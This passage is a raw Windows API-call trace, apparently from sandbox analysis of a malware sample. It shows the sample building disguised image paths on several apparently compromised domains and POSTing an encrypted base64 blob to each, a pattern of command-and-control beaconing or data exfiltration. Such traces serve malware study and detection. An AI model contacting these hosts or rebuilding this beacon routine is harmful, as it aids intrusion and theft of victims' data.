param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0049.644] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0049.644] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0050.189] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0050.189] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0050.189] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0050.190] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0050.190] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0050.190] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0050.191] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0050.191] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0050.191] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0050.191] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0050.191] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0050.191] InternetConnectW (hInternet=0xcc0004, lpszServerName="perovaphoto.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0050.191] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x3880000 [0050.191] wsprintfW (in: param_1=0x3880000, param_2="%s" | out: param_1="uploads/images/fusoru.jpg") returned 25 [0050.191] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="uploads/images/fusoru.jpg", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0050.191] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x3870000*, dwOptionalLength=0x24c | out: lpOptional=0x3870000*) returned 1 [0050.469] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0050.480] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0050.480] VirtualFree (lpAddress=0x3880000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0050.480] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0050.481] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0050.481] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://asl-company.ru") returned 21 [0050.481] lstrcpyW (in: lpString1=0x2e8d880, lpString2="content" | out: lpString1="content") returned="content" [0050.481] lstrcpyW (in: lpString1=0x2e8da80, lpString2="pictures" | out: lpString1="pictures") returned="pictures" [0050.481] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="ke" | out: lpString1="ke") returned="ke" [0050.481] lstrcatW (in: lpString1="ke", lpString2="fu" | out: lpString1="kefu") returned="kefu" [0050.481] lstrcpyW (in: lpString1=0x2e8de80, lpString2="bmp" | out: lpString1="bmp") returned="bmp" [0050.481] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://asl-company.ru/content/pictures/kefu.bmp") returned 47 [0050.481] lstrlenW (lpString="http://asl-company.ru/content/pictures/kefu.bmp") returned 47 [0050.481] lstrcpyW (in: lpString1=0x2e8d618, lpString2="content/pictures/kefu.bmp" | out: lpString1="content/pictures/kefu.bmp") returned="content/pictures/kefu.bmp" [0050.481] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0050.481] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0050.481] InternetConnectW (hInternet=0xcc0008, lpszServerName="asl-company.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0050.481] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0050.481] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0050.481] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0051.598] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0051.598] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0051.598] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0051.600] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0051.600] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0051.600] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0051.600] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0051.600] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0051.600] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0051.600] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0051.600] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0051.601] InternetConnectW (hInternet=0xcc0004, lpszServerName="asl-company.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0051.601] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x3880000 [0051.601] wsprintfW (in: param_1=0x3880000, param_2="%s" | out: param_1="content/pictures/kefu.bmp") returned 25 [0051.601] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="content/pictures/kefu.bmp", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0051.601] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x3870000*, dwOptionalLength=0x24c | out: lpOptional=0x3870000*) returned 1 [0051.891] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0051.891] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0051.891] VirtualFree (lpAddress=0x3880000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.892] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.892] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0051.892] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://www.fabbfoundation.gm") returned 28 [0051.892] lstrcpyW (in: lpString1=0x2e8d880, lpString2="content" | out: lpString1="content") returned="content" [0051.892] lstrcpyW (in: lpString1=0x2e8da80, lpString2="assets" | out: lpString1="assets") returned="assets" [0051.892] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="im" | out: lpString1="im") returned="im" [0051.892] lstrcatW (in: lpString1="im", lpString2="zu" | out: lpString1="imzu") returned="imzu" [0051.892] lstrcatW (in: lpString1="imzu", lpString2="ke" | out: lpString1="imzuke") returned="imzuke" [0051.892] lstrcatW (in: lpString1="imzuke", lpString2="so" | out: lpString1="imzukeso") returned="imzukeso" [0051.892] lstrcatW (in: lpString1="imzukeso", lpString2="he" | out: lpString1="imzukesohe") returned="imzukesohe" [0051.892] lstrcpyW (in: lpString1=0x2e8de80, lpString2="bmp" | out: lpString1="bmp") returned="bmp" [0051.892] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://www.fabbfoundation.gm/content/assets/imzukesohe.bmp") returned 58 [0051.892] lstrlenW (lpString="http://www.fabbfoundation.gm/content/assets/imzukesohe.bmp") returned 58 [0051.892] lstrcpyW (in: lpString1=0x2e8d618, lpString2="content/assets/imzukesohe.bmp" | out: lpString1="content/assets/imzukesohe.bmp") returned="content/assets/imzukesohe.bmp" [0051.892] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0051.892] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0051.892] InternetConnectW (hInternet=0xcc0008, lpszServerName="www.fabbfoundation.gm", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0051.892] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0051.892] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0051.892] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0052.459] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0052.459] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0052.459] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0052.460] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0052.460] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0052.460] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0052.461] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0052.461] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0052.461] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0052.461] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0052.461] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0052.461] InternetConnectW (hInternet=0xcc0004, lpszServerName="www.fabbfoundation.gm", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0052.461] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x3880000 [0052.461] wsprintfW (in: param_1=0x3880000, param_2="%s" | out: param_1="content/assets/imzukesohe.bmp") returned 29 [0052.462] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="content/assets/imzukesohe.bmp", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0052.462] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x3870000*, dwOptionalLength=0x24c | out: lpOptional=0x3870000*) returned 1 [0053.153] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0053.154] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0053.154] VirtualFree (lpAddress=0x3880000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0053.154] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0053.155] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0053.155] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://www.perfectfunnelblueprint.com") returned 37 [0053.155] lstrcpyW (in: lpString1=0x2e8d880, lpString2="wp-content" | out: lpString1="wp-content") returned="wp-content" [0053.155] lstrcpyW (in: lpString1=0x2e8da80, lpString2="graphic" | out: lpString1="graphic") returned="graphic" [0053.155] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="he" | out: lpString1="he") returned="he" [0053.155] lstrcatW (in: lpString1="he", lpString2="ru" | out: lpString1="heru") returned="heru" [0053.155] lstrcatW (in: lpString1="heru", lpString2="me" | out: lpString1="herume") returned="herume" [0053.155] lstrcatW (in: lpString1="herume", lpString2="am" | out: lpString1="herumeam") returned="herumeam" [0053.155] lstrcatW (in: lpString1="herumeam", lpString2="zu" | out: lpString1="herumeamzu") returned="herumeamzu" [0053.155] lstrcpyW (in: lpString1=0x2e8de80, lpString2="jpg" | out: lpString1="jpg") returned="jpg" [0053.155] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://www.perfectfunnelblueprint.com/wp-content/graphic/herumeamzu.jpg") returned 71 [0053.155] lstrlenW (lpString="http://www.perfectfunnelblueprint.com/wp-content/graphic/herumeamzu.jpg") returned 71 [0053.155] lstrcpyW (in: lpString1=0x2e8d618, lpString2="wp-content/graphic/herumeamzu.jpg" | out: lpString1="wp-content/graphic/herumeamzu.jpg") returned="wp-content/graphic/herumeamzu.jpg" [0053.155] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0053.156] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0053.156] InternetConnectW (hInternet=0xcc0008, lpszServerName="www.perfectfunnelblueprint.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0053.156] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0053.156] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0053.156] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0053.529] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0053.529] lstrcmpiA (lpString1="40x", lpString2="30x") returned 1 [0053.529] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0053.530] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0053.530] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0053.530] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0053.530] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0053.531] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0053.531] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0053.531] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0053.531] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0053.531] InternetConnectW (hInternet=0xcc0004, lpszServerName="www.perfectfunnelblueprint.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0053.531] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x3880000 [0053.531] wsprintfW (in: param_1=0x3880000, param_2="%s" | out: param_1="wp-content/graphic/herumeamzu.jpg") returned 33 [0053.531] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="wp-content/graphic/herumeamzu.jpg", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0053.531] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x3870000*, dwOptionalLength=0x24c | out: lpOptional=0x3870000*) returned 1 [0054.057] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0054.057] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0054.058] VirtualFree (lpAddress=0x3880000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0054.060] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0054.060] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0054.060] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://www.wash-wear.com") returned 24 [0054.061] lstrcpyW (in: lpString1=0x2e8d880, lpString2="static" | out: lpString1="static") returned="static" [0054.061] lstrcpyW (in: lpString1=0x2e8da80, lpString2="image" | out: lpString1="image") returned="image" [0054.061] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="es" | out: lpString1="es") returned="es" [0054.061] lstrcatW (in: lpString1="es", lpString2="ke" | out: lpString1="eske") returned="eske" [0054.061] lstrcpyW (in: lpString1=0x2e8de80, lpString2="png" | out: lpString1="png") returned="png" [0054.061] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://www.wash-wear.com/static/image/eske.png") returned 46 [0054.061] lstrlenW (lpString="http://www.wash-wear.com/static/image/eske.png") returned 46 [0054.061] lstrcpyW (in: lpString1=0x2e8d618, lpString2="static/image/eske.png" | out: lpString1="static/image/eske.png") returned="static/image/eske.png" [0054.061] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0054.061] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0054.061] InternetConnectW (hInternet=0xcc0008, lpszServerName="www.wash-wear.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0054.061] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0054.061] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0054.061] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, 